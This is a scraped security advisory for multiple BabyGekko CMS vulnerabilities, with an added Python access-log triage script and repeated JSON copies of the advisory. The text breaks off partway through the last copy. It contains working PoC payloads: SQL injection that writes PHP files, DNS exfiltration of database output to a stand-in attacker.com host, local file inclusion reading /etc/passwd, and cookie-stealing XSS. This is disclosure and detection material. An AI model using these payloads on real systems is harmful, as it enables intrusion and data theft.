High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple SQL Injections in BabyGekko: CVE-2012-5698
Two SQL injections exist in the BabyGekko administrator's panel, but their exploitation requires administrator privileges. However, they can also be exploited by a non-authenticated malicious user via a CSRF vector, because the "/admin/index.php" script is also vulnerable to CSRF. To do so, the attacker has to make a logged-in administrator visit a malicious page.
1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within the application's database.
The following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and write "<?phpinfo()?>" into it:
http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20
The second PoC below is based on the DNS exfiltration technique and may be used when the application's database is hosted on a Windows system. The PoC sends a DNS request to resolve the IP address of the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", served by an attacker-controlled DNS server:
http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --
1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within the application's database.
The following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and write "<?phpinfo()?>" into it:
http://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20
The second PoC below is based on the DNS exfiltration technique and may be used when the application's database is hosted on a Windows system. The PoC sends a DNS request to resolve the IP address of the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", served by an attacker-controlled DNS server:
http://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --
2) Local File Inclusion in BabyGekko: CVE-2012-5699
The vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from the local system using directory traversal sequences with a NULL byte.
The following PoC will show the "/etc/passwd" file:
http://[host]/index.php?app=../../../../../../../etc/passwd%00
The second PoC demonstrates inclusion of the "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions, it will show the results of "phpinfo()" function execution:
http://[host]/index.php?app=../../../../../../../tmp/
3) Multiple Cross-Site Scripting (XSS) in BabyGekko: CVE-2012-5700
3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
The following PoC code demonstrates the vulnerability:
http://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
3.2 Insufficient sanitization of input passed via the "username" and "password" HTTP POST parameters to "index.php" can be used to inject and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation of this vulnerability requires the "loginbox" block to be activated.
The following PoC code demonstrates the vulnerability:
<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
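For triage of web server logs from an affected install, the request shapes described in sections 1.1, 1.2, 2 and 3.1 can be matched after percent-decoding and after collapsing the `CHAR(n)` lists back into the string they build. This is an added example, not code from the advisory or from BabyGekko; it assumes combined-format access logs and a site hostname `cms.example`, and the log lines are constructed. Section 3.2 travels in a POST body and is not visible in access logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "cms.example"  # assumption: hostname of the site being reviewed

LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)
CHAR_RUN = re.compile(r"CHAR\(\s*\d+\s*\)(?:\s*,\s*CHAR\(\s*\d+\s*\))*", re.I)
SQLI = re.compile(
    r"\bunion\b.+\bselect\b|\binto\s+(?:out|dump)file\b|\bload_file\s*\(",
    re.I | re.S,
)
UNC_LOAD = re.compile(r"load_file\s*\(.*\\\\", re.I | re.S)  # load_file(... \\host
EXFIL_HOST = re.compile(r"'\.([A-Za-z0-9.-]+)\\")            # '.domain\share'


def collapse_char_calls(sql):
    """Rewrite runs of CHAR(n),CHAR(n),... as the quoted string they build."""
    def repl(match):
        codes = [int(n) for n in re.findall(r"\d+", match.group(0))]
        return "'" + "".join(chr(c) if c < 256 else "?" for c in codes) + "'"
    return CHAR_RUN.sub(repl, sql)


def classify(line):
    """Return the sorted finding tags for one access-log line ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    path = url.path.lower()
    findings = set()

    if path.endswith("/admin/index.php"):
        for name in ("keyword", "query"):                 # sections 1.1 and 1.2
            for value in params.get(name, []):
                decoded = collapse_char_calls(value)
                if not SQLI.search(decoded):
                    continue
                findings.add("CVE-2012-5698:sqli:" + name)
                if re.search(r"into\s+(?:out|dump)file", decoded, re.I):
                    findings.add("file-write")
                if UNC_LOAD.search(decoded):
                    host = EXFIL_HOST.search(decoded)
                    findings.add("unc-load_file:" + (host.group(1) if host else "?"))
        for value in params.get("id", []):                # section 3.1
            if re.search(r'[<>"]', value):
                findings.add("CVE-2012-5700:xss:id")
        # The advisory notes the admin script is reachable via CSRF, so a
        # foreign Referer on a flagged admin request is worth recording.
        ref_host = urlsplit(m.group("referer")).hostname
        if findings and ref_host and ref_host != SITE_HOST:
            findings.add("cross-site-referer")

    if path.endswith("/index.php"):                       # section 2
        for value in params.get("app", []):
            if "../" in value or "\x00" in value:
                findings.add("CVE-2012-5699:lfi:app")
    return sorted(findings)


# Constructed sample lines: IPs, times, sizes and referers are made up; the
# request targets follow the parameter shapes given in the advisory.
_CHARS = ",".join("CHAR(%d)" % ord(c) for c in ".attacker.com\\foobar")
_PRE = '198.51.100.20 - - [15/Nov/2012:09:12:01 +0000] "GET '
SAMPLE_LOG = [
    _PRE + "/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29"
    "%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27marker%27%20INTO%20OUTFILE"
    '%20%27/tmp/.class.php%27%20--%202%20 HTTP/1.1" 200 431 '
    '"http://forum.example/thread/77" "Mozilla/5.0"',
    _PRE + "/admin/index.php?app=html&action=getlistofusers&query=%27%20OR"
    "%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),"
    + _CHARS + ')))%20-- HTTP/1.1" 200 88 '
    '"http://cms.example/admin/index.php" "Mozilla/5.0"',
    _PRE + '/index.php?app=../../../../../../../etc/passwd%00 HTTP/1.1" '
    '200 1873 "-" "curl/7.28"',
    _PRE + "/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript"
    '%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 900 '
    '"http://mail.example/inbox" "Mozilla/5.0"',
    _PRE + '/admin/index.php?app=users&ajax=1&action=search&keyword=alice '
    'HTTP/1.1" 200 210 "http://cms.example/admin/index.php" "Mozilla/5.0"',
]


def triage(lines):
    """Map line index -> findings for every line that matched something."""
    results = ((i, classify(line)) for i, line in enumerate(lines))
    return {i: tags for i, tags in results if tags}


if __name__ == "__main__":
    for index, tags in triage(SAMPLE_LOG).items():
        print(index, tags)
```

A hit on `file-write` followed by an `lfi:app` hit from the same client matches the chain the advisory describes between vulnerabilities 1.x and 2.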
Advisory ID: HTB23122
Product: BabyGekko
Vendor: babygekko.com
Vulnerable Version(s): 1.2.2e and probably prior
Tested Version: 1.2.2e
Vendor Notification: October 24, 2012
Vendor Patch: November 4, 2012
Public Disclosure: November 14, 2012
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700
CVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
Solution:
Upgrade to BabyGekko 1.2.2f or 1.2.4
More Information:
http://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip
http://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html
\n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/118104/babygekko-xsslfisql.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-5699", "CVE-2012-5698", "CVE-2012-5700"], "description": "\r\n\r\nAdvisory ID: HTB23122\r\nProduct: BabyGekko\r\nVendor: babygekko.com\r\nVulnerable Version(s): 1.2.2e and probably prior\r\nTested Version: 1.2.2e\r\nVendor Notification: October 24, 2012 \r\nVendor Patch: November 4, 2012 \r\nPublic Disclosure: November 14, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\r\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Multiple SQL Injections in BabyGekko\r\n\r\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. 
\r\n\r\n1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \r\n\r\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". 
A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\r\n\r\nThe following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n2) Local File Inclusion in BabyGekko\r\n\r\nThe vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \r\n\r\nThe following PoC will show the "/etc/passwd" file:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\r\n\r\nSecond PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. 
Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../tmp/\r\n\r\n\r\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\r\n\r\n3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">\r\n<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to BabyGekko 1.2.2f or 1.2.4\r\n\r\nMore Information:\r\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\r\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.\r\n[2] BabyGekko - 
http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2012-11-18T00:00:00", "published": "2012-11-18T00:00:00", "id": "SECURITYVULNS:DOC:28764", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28764", "title": "Multiple vulnerabilities in BabyGekko", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:49:27", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2012-11-18T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-5694", "CVE-2012-5696", "CVE-2012-4197", "CVE-2012-5695", "CVE-2012-5475", "CVE-2012-4199", "CVE-2012-5699", "CVE-2012-3414", "CVE-2012-5697", "CVE-2012-5698", "CVE-2012-5700", "CVE-2012-4189", "CVE-2012-5693", "CVE-2012-4198", "CVE-2012-4520"], "modified": "2012-11-18T00:00:00", "id": "SECURITYVULNS:VULN:12719", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12719", "cvss": {"score": 6.8, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T17:18:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "BabyGekko 1.2.2e Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5698", "CVE-2012-5699", "CVE-2012-5700"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-76538", "id": "SSV:76538", "sourceData": "\n Advisory ID: HTB23122\r\nProduct: BabyGekko\r\nVendor: babygekko.com\r\nVulnerable Version(s): 1.2.2e and probably prior\r\nTested Version: 1.2.2e\r\nVendor Notification: October 24, 2012 \r\nVendor Patch: November 4, 2012 \r\nPublic Disclosure: November 14, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\r\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Multiple SQL Injections in BabyGekko\r\n\r\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. 
\r\n\r\n1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \r\n\r\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". 
A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\r\n\r\nThe following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n2) Local File Inclusion in BabyGekko\r\n\r\nThe vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \r\n\r\nThe following PoC will show the "/etc/passwd" file:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\r\n\r\nSecond PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. 
Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:\r\n\r\nhttp://[host]/index.php?app=../../../../../../../tmp/\r\n\r\n\r\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\r\n\r\n3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.\r\n\r\nThe following PoC code demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">\r\n<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to BabyGekko 1.2.2f or 1.2.4\r\n\r\nMore Information:\r\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\r\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.\r\n[2] BabyGekko - 
http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-76538", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2022-08-16T06:37:08", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2012-11-15T00:00:00", "type": "exploitdb", "title": "BabyGekko 1.2.2e - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2012-5698", "2012-5699", "2012-5700", "CVE-2012-5698", "CVE-2012-5699", "CVE-2012-5700"], "modified": "2012-11-15T00:00:00", "id": "EDB-ID:22741", "href": "https://www.exploit-db.com/exploits/22741", "sourceData": "Advisory ID: HTB23122\r\nProduct: BabyGekko\r\nVendor: babygekko.com\r\nVulnerable Version(s): 1.2.2e and probably prior\r\nTested Version: 1.2.2e\r\nVendor Notification: October 24, 2012 \r\nVendor Patch: November 4, 2012 \r\nPublic Disclosure: November 14, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\r\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Multiple SQL Injections in BabyGekko\r\n\r\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because \"/admin/index.php\" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \r\n\r\n1.1 The vulnerability exists due to insufficient validation of input passed via the \"keyword\" parameter to \"/admin/index.php\" (when \"app\" is set to \"users\"). 
A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \r\n\r\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\r\n\r\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server:\r\n\r\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n1.2 The vulnerability exists due to insufficient validation of input passed via the \"query\" parameter to \"/admin/index.php\". 
